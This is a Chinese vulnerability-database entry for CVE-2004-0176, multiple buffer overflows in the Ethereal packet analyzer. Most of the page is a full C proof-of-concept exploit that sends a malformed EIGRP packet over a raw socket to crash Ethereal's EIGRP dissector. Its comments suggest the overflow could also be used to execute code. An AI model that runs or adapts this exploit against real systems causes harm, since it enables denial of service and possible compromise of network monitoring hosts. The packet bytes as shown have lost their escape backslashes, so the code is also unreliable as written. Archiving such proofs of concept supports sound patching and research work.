Ethereal多重漏洞

Ethereal多重漏洞

漏洞ID 1107829 漏洞类型 缓冲区溢出
发布时间 2004-03-26 更新时间 2005-10-20
图片[1]-Ethereal多重漏洞-安全小百科CVE编号 CVE-2004-0176
图片[2]-Ethereal多重漏洞-安全小百科CNNVD-ID CNNVD-200405-037
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/170
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200405-037
|漏洞详情
Ethereal0.8.13到0.10.2版本存在多个缓冲区溢出漏洞。远程攻击者借助(1)NetFlow,(2)IGAP,(3)EIGRP,(4)PGM,(5)IrDA,(6)BGP,(7)ISUP,或者(8)TCAPdissectors导致服务拒绝和可能执行任意代码。
|漏洞EXP
/*
 * Ethereal network protocol analyzer
 * EIGRP Dissector TLV_IP_INT Long IP Address Overflow
 * vulnerability
 * proof of concept code
 * version 1.0 (Mar 26 2004)
 *
 * by R�mi Denis-Courmont < ethereal at simphalampin dot com >
 *   www simphalempin com dev 
 *
 * This vulnerability was found by:
 *   Stefan Esser s.esser e-matters de
 * whose original advisory may be fetched from:
 *   security e-matters de advisories 032004.html
 *
 * Vulnerable:
 *  - Ethereal v0.10.2
 *
 * Not vulnerable:
 *  - Ethreal v0.10.3
 *
 * Note: this code will simply trigger a denial of service on Ethereal.
 * It should really be possible to exploit the buffer overflow
 * (apparently up to 29 bytes overflow), but I haven't tried.
 */


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>

static const char packet[] =
        "x01" /* Version */
        "x04" /* Opcode: Reply */
        "x00x00" /* Checksum (invalid) */
        "x00x00x00x00" /* Flags */
        "x00x00x00x00" /* Sequence number */
        "x00x00x00x00" /* ACK */
        "x00x00x00x00" /* AS number */

        /* IP internal routes TLV */
        "x01x02" /* Type */
        "x00x39" /* Length (should be 0x1C) */
        "x00x00x00x00" /* Next hop */
        "x00x00x00x00" /* Delay */
        "x00x00x00x00" /* Bandwitdh */
        "x00x00x00" /* MTU */
        "x00" /* Hop count: directly connected */
        "xff" /* Reliability: maximum */
        "x01" /* Load: minimum */
        "x00x00" /* Reserved */
        "xff" /* Prefix length: should be > 0 and <= 32 */
        "x00x00x00" /* Destination network */
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xff" /* buffer overflow */
;


static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;

        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }

        len = sizeof (packet) - 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }

        puts ("Packet sent!");
        close (fd);
        return 0;
}


static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>n", path);
        return 2;
}


int
main (int argc, char *argv[])
{
        struct sockaddr *dest;

        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflown"
                "proof of concept coden"
                "Copyright (C) 2004 R<E9>mi Denis-Courmont "
                "<x65x74x68x65x72x65x61x6cx40x73x69x6dx70"
                "x68x61x6cx65x6dx70x69x6ex2ex63x6fx6d>n");


        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;

                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;

                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %sn", argv[1],
                                        gai_strerror (check));
                        return 1;
                }

                dest = res->ai_addr;
        }

        return proof ((const struct sockaddr_in *)dest);
}
|参考资料

来源:US-CERTVulnerabilityNote:VU#931588
名称:VU#931588
链接:http://www.kb.cert.org/vuls/id/931588
来源:US-CERTVulnerabilityNote:VU#864884
名称:VU#864884
链接:http://www.kb.cert.org/vuls/id/864884
来源:US-CERTVulnerabilityNote:VU#740188
名称:VU#740188
链接:http://www.kb.cert.org/vuls/id/740188
来源:US-CERTVulnerabilityNote:VU#659140
名称:VU#659140
链接:http://www.kb.cert.org/vuls/id/659140
来源:US-CERTVulnerabilityNote:VU#644886
名称:VU#644886
链接:http://www.kb.cert.org/vuls/id/644886
来源:US-CERTVulnerabilityNote:VU#591820
名称:VU#591820
链接:http://www.kb.cert.org/vuls/id/591820
来源:US-CERTVulnerabilityNote:VU#433596
名称:VU#433596
链接:http://www.kb.cert.org/vuls/id/433596
来源:US-CERTVulnerabilityNote:VU#125156
名称:VU#125156
链接:http://www.kb.cert.org/vuls/id/125156
来源:US-CERTVulnerabilityNote:VU#119876
名称:VU#119876
链接:http://www.kb.cert.org/vuls/id/119876
来源:DEBIAN
名称:DSA-511
链接:http://www.debian.org/security/2004/dsa-511
来源:BUGTRAQ
名称:20040329LNSA-#2004-0007:MultiplesecurityproblemsinEthereal
链接:http://marc.theaimsgroup.co

相关推荐: cmd5checkpw服务拒绝漏洞

cmd5checkpw服务拒绝漏洞 漏洞ID 1206116 漏洞类型 未知 发布时间 2000-12-19 更新时间 2005-10-12 CVE编号 CVE-2000-0990 CNNVD-ID CNNVD-200012-180 漏洞平台 N/A CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享